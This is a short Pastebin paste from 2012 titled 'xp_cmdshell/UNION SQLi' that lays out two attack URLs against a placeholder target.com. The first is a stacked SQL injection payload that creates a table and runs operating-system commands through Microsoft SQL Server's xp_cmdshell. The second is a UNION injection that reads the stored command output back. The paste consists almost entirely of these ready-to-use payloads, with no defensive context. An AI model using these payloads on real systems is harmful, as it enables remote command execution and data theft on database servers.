stamparm

xp_cmdshell/UNION SQLi

Jun 20th, 2012
421
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 1) executing xp_cmdshell
  2. http://www.target.com/vuln.asp?param=1';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
  3.  
  4. 2) result retrieval through UNION injection
  5. http://www.target.com/vuln.asp?param=-1' UNION ALL SELECT NULL, NULL, output FROM result--
RAW Paste Data